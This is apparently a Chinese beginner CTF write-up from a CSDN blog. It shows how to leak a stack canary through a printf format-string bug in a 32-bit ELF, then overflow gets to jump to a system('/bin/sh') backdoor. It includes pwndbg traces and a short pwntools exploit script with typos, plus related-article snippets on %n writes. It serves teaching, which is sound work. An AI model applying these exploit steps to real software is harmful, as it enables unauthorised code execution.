使用格式化字符串漏洞绕过Canary保护(32位ELF)萌新篇

最新推荐文章于 2024-01-27 21:55:15 发布
最新推荐文章于 2024-01-27 21:55:15 发布
阅读量433 收藏 4
点赞数 1
文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73481933/article/details/128695089
版权

点击下载例题

做题步骤

检查文件保护

在这里插入图片描述
32位文件,开启了NX和Canary保护
先介绍一下保护
NX: NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
Canary: 这个选项表示栈保护功能有没有开启。
栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。原理是在一个函数的入口,先从fs/gs寄存器中取出一个四字节(eax)或者八字节的rax的值存在栈上(最低位都是\x00),当函数结束是会检查这个栈上的值是否和存在去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序就会执行___stack_chk_fali函数,继而保护程序
在这里插入图片描述

绕过方法

printf属于可变参数函数,函数调用者可以指定参数和数量,这样我是漏洞产生的原因

ida查看

在这里插入图片描述
漏洞:printf(格式化字符串漏洞)和易导致栈溢出的函数gets
同时返现后门函数sys(“/bin/sh”)
在这里插入图片描述**思路:**先覆盖canary处的值,添上canary的值,然后覆盖至canary_protect_me处,getshell。
首先,在printf函数处下断点,看字符串在堆栈中的位置

pwndbg> b printf
Breakpoint 1 at 0x80483e0
pwndbg> r
Starting program: /home/fanfan/Desktop/Basic question type/binary_200 
aaaa

Breakpoint 1, __printf (format=0xffffd494 "aaaa") at printf.c:28
28	printf.c: 没有那个文件或目录.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*EAX  0xffffd494 ◂— 'aaaa'
 EBX  0x0
*ECX  0xf7fb3580 (_IO_2_1_stdin_) ◂— 0xfbad2288
*EDX  0xffffd498 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 (_DYNAMIC) ◂— 0x1
*EDI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*ESI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*EBP  0xffffd4c8 ◂— 0x0
*ESP  0xffffd47c —▸ 0x80485d8 (main+119) ◂— lea eax, [esp + 0x14]
*EIP  0xf7e182b0 (printf) ◂— endbr32 
──────────────────────[ DISASM / i386 / set emulate on ]───────────────────────
 ► 0xf7e182b0 <printf>       endbr32 
   0xf7e182b4 <printf+4>     call   __x86.get_pc_thunk.ax                    <__x86.get_pc_thunk.ax>
 
   0xf7e182b9 <printf+9>     add    eax, 0x19ad47
   0xf7e182be <printf+14>    sub    esp, 0xc
   0xf7e182c1 <printf+17>    lea    edx, [esp + 0x14]
   0xf7e182c5 <printf+21>    push   0
   0xf7e182c7 <printf+23>    push   edx
   0xf7e182c8 <printf+24>    push   dword ptr [esp + 0x18]
   0xf7e182cc <printf+28>    mov    eax, dword ptr [eax - 0x74]
   0xf7e182d2 <printf+34>    push   dword ptr [eax]
   0xf7e182d4 <printf+36>    call   __vfprintf_internal                    <__vfprintf_internal>
───────────────────────────────────[ STACK ]───────────────────────────────────
00:0000│ esp 0xffffd47c —▸ 0x80485d8 (main+119) ◂— lea eax, [esp + 0x14]
01:0004│     0xffffd480 —▸ 0xffffd494 ◂— 'aaaa'
02:0008│     0xffffd484 ◂— 0x0
03:000c│     0xffffd488 ◂— 0x1
04:0010│     0xffffd48c ◂— 0x0
05:0014│     0xffffd490 —▸ 0xf7fb33fc (__exit_funcs) —▸ 0xf7fb4180 (initial) ◂— 0x0
06:0018│ eax 0xffffd494 ◂— 'aaaa'
07:001c│ edx 0xffffd498 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 (_DYNAMIC) ◂— 0x1
─────────────────────────────────[ BACKTRACE ]─────────────────────────────────
 ► f 0 0xf7e182b0 printf
   f 1 0x80485d8 main+119
   f 2 0xf7de2ed5 __libc_start_main+245

尝试打印该地址的内存

pwndbg> x/20wx 0xffffd480
0xffffd480:	0xffffd494	0x00000000	0x00000001	0x00000000
0xffffd490:	0xf7fb33fc	0x61616161	0x0804a000	0x08048652
0xffffd4a0:	0x00000001	0xffffd564	0xffffd56c	0xf7dfc469
0xffffd4b0:	0xf7fe22b0	0x00000000	0x0804860b	0x7a439500
0xffffd4c0:	0xf7fb3000	0xf7fb3000	0x00000000	0xf7de2ed5

从0x00000000开始,确定字符串的偏移量为5

结合汇编看一下
在这里插入图片描述
可以得到寄存器edx(esp+3Ch)里存放的是Canary的值:

 EAX  0x0
 EBX  0x0
*ECX  0xffffffff
*EDX  0x438e0b00
*EDI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*ESI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*EBP  0xffffd4c8 ◂— 0x0
*ESP  0xffffd480 —▸ 0xffffd494 ◂— 0x61616100
*EIP  0x80485ed (main+140) ◂— xor edx, dword ptr gs:[0x14]

在上边查看,可以得出canary偏移量为15,所以在第一次gets时发送%15$x就会(printf)泄露canary的值
然后我们来确定第一次gets到canary的偏移,我们知道[esp+0x3c]即v5处处存放canary的随机参数,在IDA中我们分别进入v5和第一个&s,发现偏移40
在这里插入图片描述

EAX  0x0
 EBX  0x0
*ECX  0xffffffff
*EDX  0x438e0b00
*EDI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*ESI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
*EBP  0xffffd4c8 ◂— 0x0
*ESP  0xffffd480 —▸ 0xffffd494 ◂— 0x61616100
*EIP  0x80485ed (main+140) ◂— xor edx, dword ptr gs:[0x14]

然后我们通过上边查看,图中已经有了esp和ebp的地址,我们可以算出v5=[esp+0x3c]=ffffd4d0,v5的偏移量=ebp-v5,结果为12

exp
from pwn import *
p = prcess('./binary_200')
system_addr = 0x0804854d
p.sendline('%15$x')
canary = int(p.recv(),16)
print(hex(canary))
payload = b'a'*40+p32(canary)+b'a'*12 +p32(system_addr)
print(hex(payload))
print(payload)
p.sendline(payload)
p.interactive()

getshell

godarcher
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
格式化字符串漏洞利用之泄露canary
weixin_44113469的博客
03-31 1510
两道格式化字符串漏洞利用入门题,绕过canary的一种姿势,不知道写的对不对,请大家多指正。 0x01 Canary 保护 开启了NX和canary。 题目分析 有个getshell函数,vuln函数里面明显的栈溢出和格式化字符串漏洞,所以可以利用printf函数泄露出canary的值,然后利用栈溢出填充canary,控制返回指针执行getshell函数。 栈 从栈的情况看,var_8...
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
02-24
我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。Stackcanary保护机制在刚进入函数时,在栈上放置一个标志canary,然后在函数结束...
格式化字符串漏洞_格式化字符串绕过canary入门
weixin_39611340的博客
12-09 172
原创: EDI-VOID 合天智汇 知识格式化字符串漏洞是因为c语言中printf的参数个数不是确定的,参数的长度也不是确定的,当printf把我们的输入当作第一个参数直接输出的时候,我们输入若干格式化字符串,会增加与格式化字符串相对应的参数,会泄露出栈中的内容Canary的工作原理就是子函数在做自己的事情之前,在自己的栈帧里返回地址之前插入一个随机的cookie,从gs:0x14的地方取出...
32位格式化字符串漏洞实现任意地址内存覆盖
z2876563的博客
08-11 1100
32位格式化字符串漏洞实现任意地址内存覆盖 原理 int i; printf("AAAA%n",&i) 此时i=4 漏洞利用例子 比如想将2写入0xffffcd28。则构造payload"AA%15nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,%15nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,n5个字节,为了
格式化字符串漏洞(Format String Attack)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
03-22 461
格式化字符串漏洞(Format String Attack)
ex2(canary绕过
qq_51687381的博客
05-25 459
先上IDA看一波反汇编
栈溢出之canary泄露与绕过“新方法” .pdf
09-05
这里提到的“新方法”是一种利用printf函数和格式化字符串漏洞的方法。如果程序中存在格式化字符串漏洞,攻击者可以精心构造输入,使得printf函数不仅打印预期的输出,还意外地揭示Canary值。一旦Canary值被泄露,...
ChromeCanary(金丝雀版) v82.0.4077.0官方版(32/64位)
11-09
基本简介 金丝雀(Canary)版Chrome是Google推出的一个特别版Chrome。可以同时安装/运行两个Chrome版本,比如,安装Chrome 稳定版/Beta测试版/开发者版本,同时安装使用Chrome金丝雀版本(目前
ChromeCanary 浏览器金丝雀版 v87.0.4265.0官方版(32/64位)
12-25
为您提供ChromeCanary 浏览器金丝雀版下载,Chrome Canary(金丝雀版)作为谷歌浏览器的最新测试版几乎保持了每天都在更新的状态,如果您想第一时间体验到新功能,新界面,新特性,可以大胆的尝试这款Chrome Canary版...
[zz]linux elf loader漏洞
weixin_33919941的博客
08-04 124
Linux Kernel ELF Binary Loader Local Proof of Concept http://forum.eviloctal.com/thread-4414-1-1.html http://www.sudu.cn/info/html/edu/20050104/198595.html /***binfmt_elf executable file read ...
针对ELF文件缓冲区溢出漏洞的检测技术
07-03
文章介绍了缓冲区溢出漏洞现状,提出了一种针对ELF文件格式文件潜在缓冲区溢出漏洞的检测技术
通过一次自制实验一步步入门格式化字符串漏洞——记一次学习32位ELF文件格式化字符串漏洞原理的实验-详细分析
weixin_52111404的博客
11-05 528
PWN-格式化字符串漏洞,通过实验一步一步分析格式化字符串漏洞,原理
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR
X丶 的博客
11-21 2201
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
Linux_x86下NX与ASLR绕过技术(续)
weixin_30809333的博客
11-03 250
四、Stack Canaries 首先看一下Stack Canaries演进历史: Stack Guard 是第一个使用 Canaries 探测的堆栈保护实现,它于 1997 年作为 GCC 的一个扩展发布。最初版本的 Stack Guard 使用 0x00000000 作为 canary word。尽管很多人建议把 Stack Guard 纳入 GCC,作为 GCC 的一部分来提供堆栈保护。...
栈溢出基本ROP绕过ASLR和NX保护
ditto的博客
12-28 3493
菜鸡刚学rop,总结下,算是对蒸米大佬这文章最后一个样例的一点解释说明。 笔记中的程序源代码来自 蒸米大佬的x86一步一步学rop http://www.vuln.cn/6645 计算溢出点的位置的脚本可以在大佬的github上下载(其实从IDA上也可以计算出来溢出点) https://github.com/zhengmin1989/ROP_STEP_BY_STEP 预备知识: 了解动态链接中P...
栈溢出原理和绕过技术 | NX、CANARY、ASLR、RELRO
Sakura给爷pwn全场
12-16 832
GitHub: https://github.com/ylcangel/binary_vulnerability/
canary介绍与绕过技巧
0pt1mus
04-02 6412
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当...
hijack GOT
weixin_73481933的博客
01-28 182
这是main函数,起始的ask_username函数和ask_password函数应该就是检查登录的函数,可以看到当command = 2时执行put_file函数,command = 3时执行show_dir函数,command = 1时执行get_file函数(判断条件应该是ida解析的时候出现问题了,应该都没有“!在没有开启RELRO保护的前提下,每个libc的函数对应的GOT表项是可以被修改的。这个函数会有一次输入,让我们选择要打印的文件,并且打印出我们输入的文件内容,并且能够在最后看到很明显的。
Canary、Pie保护
最新发布
2301_79880752的博客
01-27 832
Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置。
canary3 利用格式化漏洞泄露canary 利用ROP执行shell
06-09
您的问题是关于利用格式化漏洞泄露canary并利用ROP执行shell的问题。 首先,格式化漏洞是一种常见的安全漏洞,可以通过控制格式化字符串的方式来读取和修改内存中的数据。其中,canary是一种用于防御缓冲区溢出攻击的机制,它会在程序的栈上插入一个随机值,并在程序退出时检查该值是否被修改,以此来检测是否发生了缓冲区溢出攻击。 利用格式化漏洞泄露canary的一般思路是通过格式化字符串的方式来读取栈上的数据,包括canary的值,然后利用这个值来构造一个假的栈帧,绕过canary的检测。具体实现上,可以使用类似于%lx的格式化字符串来读取栈上的数据。 接下来,利用ROP执行shell的一般思路是通过利用程序中已有的代码段来构造一个ROP链,以此来执行一段自己构造的代码。这个过程需要先找到程序中已有的可用代码段,然后将这些代码段的地址和参数压入栈中,最终利用ret指令来跳转到这些代码段的地址,以此来执行一段自己构造的代码。具体实现上,可以使用一些ROP工具来辅助构造ROP链,比如ROPgadget、ROPtool等。 需要注意的是,利用格式化漏洞和ROP执行shell都是一些高级的安全攻击技术,需要有深入的理解和实践经验。同时,这些攻击技术也可能会被防御措施所阻挡,因此在实际攻击中需要根据具体情况来选择合适的攻击方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值